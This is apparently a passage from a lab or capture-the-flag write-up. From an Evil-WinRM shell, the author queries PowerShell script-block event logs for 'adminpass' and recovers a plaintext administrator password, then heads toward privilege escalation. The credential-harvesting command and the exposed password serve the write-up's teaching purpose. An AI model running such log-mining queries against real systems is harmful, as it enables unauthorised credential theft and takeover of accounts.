Event Log
It has been identified that the current user is part of the Event Log Reader group on the compromised host.
Additionally, PEAS was able to read some of the sensitive event logs.
*Evil-WinRM* PS C:\Users\scripting\Documents> Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-PowerShell/Operational';ID=4104} | Select-Object TimeCreated,Id,@{n='Script';e={$_.Properties[2].Value}} | Format-Table -Wrap -AutoSize | findstr "adminpass"
$adminpass = 'TheShellIsMightierThanTheSword!'
net user administrator $adminpass /Y
[System.String]$Content = $adminpassThe password of the administrator account identified; TheShellIsMightierThanTheSword!
Moving on to the Privilege Escalation phase.